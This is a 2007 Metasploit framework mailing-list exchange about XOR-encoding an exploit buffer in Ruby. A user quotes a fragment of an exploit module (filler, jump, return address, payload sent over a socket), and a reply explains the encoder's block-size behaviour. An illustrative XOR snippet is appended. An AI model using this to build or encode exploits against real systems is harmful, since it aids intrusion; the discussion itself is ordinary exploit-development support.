[framework] Need assistance with payload xor

mmiller at hick.org
Wed Mar 28 23:29:32 PDT 2007


On Wed, Mar 28, 2007 at 12:52:21PM -0500, ri0t wrote:
>                 filler = rand_text_english(1) * (target['Offset'])
>                 jump = [0xeb06eb06].pack("V")
>                 retadd = [target.ret].pack('V')
>                 buffer = jump + retadd + payload.encoded
>                 buffercoded = xor.encode(buffer, [0xb3].pack("V"))
>                 sploit = header + filler + buffercoded[0]
>                 sock.put(sploit)
> 
>                 handler
>                 disconnect
>         end
> 
> 
> Unfortunately the xor.encode only XORs the first byte of jump, retadd
> and payload, not the entire buffer.  I am sure it's something I am
> missing due to a simple lack of Ruby knowledge, but if anyone could
> point me in the right direction I would be grateful.

Since you're using the Generic XOR, it defaults to using the size of the
key as the block size for encoding.  I'm guessing what you actually want
to do is XOR each individual byte with 0xb3.  To do this you should use
Rex::Encoding::Xor::Byte.  Make sure you use [0xb3].pack("C").  I think
this should give you the results you're looking for.  If it's still not
working let us know.
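As an added illustration of the block-size behaviour described above (example code written for this page, not code from the thread or from Rex itself): a small repeating-key XOR that, like Rex::Encoding::Xor::Generic as explained in the reply, uses the key length as the block size. It shows why a key built with pack("V") leaves three of every four bytes untouched while a key built with pack("C") changes every byte. The buffer contents (a placeholder return address and 'A' filler standing in for payload.encoded) are constructed for the example.

```ruby
# Stand-in for a key-length-as-block-size XOR encoder (assumption: this
# mirrors the behaviour the reply attributes to Rex::Encoding::Xor::Generic).
# Each byte of +buf+ is XORed with the key byte at the same offset modulo
# the key length, so the key repeats across the buffer.
def xor_repeating(buf, key)
  raise ArgumentError, 'key must be a non-empty String' if !key.is_a?(String) || key.empty?
  kb = key.bytes
  buf.bytes.each_with_index.map { |b, i| b ^ kb[i % kb.length] }.pack('C*')
end

# Count how many byte positions differ between two equal-length strings.
def changed_bytes(a, b)
  a.bytes.zip(b.bytes).count { |x, y| x != y }
end

# Constructed sample buffer with the same layout as the thread's code:
# short jump, placeholder return address, filler instead of a real payload.
JUMP    = [0xeb06eb06].pack('V')
RETADD  = [0x41414141].pack('V')   # placeholder value, constructed
PAYLOAD = 'A' * 8                  # stand-in for payload.encoded
BUFFER  = JUMP + RETADD + PAYLOAD

# The original call: [0xb3].pack("V") is the 4-byte key "\xb3\x00\x00\x00".
# With key length as block size, only byte 0 of each 4-byte block changes;
# bytes 1..3 are XORed with 0x00 and stay as they were.
def dword_key_result
  xor_repeating(BUFFER, [0xb3].pack('V'))
end

# The suggested fix: [0xb3].pack("C") is a 1-byte key, so every byte is
# XORed with 0xb3.
def byte_key_result
  xor_repeating(BUFFER, [0xb3].pack('C'))
end

if __FILE__ == $0
  puts "dword key changed #{changed_bytes(BUFFER, dword_key_result)} of #{BUFFER.bytesize} bytes"
  puts "byte  key changed #{changed_bytes(BUFFER, byte_key_result)} of #{BUFFER.bytesize} bytes"
  # XOR is its own inverse: applying the same key again restores the buffer.
  puts xor_repeating(byte_key_result, [0xb3].pack('C')) == BUFFER
end
```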


